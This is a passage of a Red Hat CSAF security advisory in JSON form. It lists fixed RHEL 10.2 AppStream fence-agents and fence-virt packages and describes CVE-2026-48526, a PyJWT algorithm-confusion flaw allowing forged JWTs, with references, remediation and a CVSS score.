"product_reference": "fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virt-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virt-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.2.Z:fence-agents-0:4.16.0-21.el10_2.2.src",
"AppStream-10.2.Z:fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-15T02:41:20+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-10.2.Z:fence-agents-0:4.16.0-21.el10_2.2.src",
"AppStream-10.2.Z:fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25902"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"AppStream-10.2.Z:fence-agents-0:4.16.0-21.el10_2.2.src",
"AppStream-10.2.Z:fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
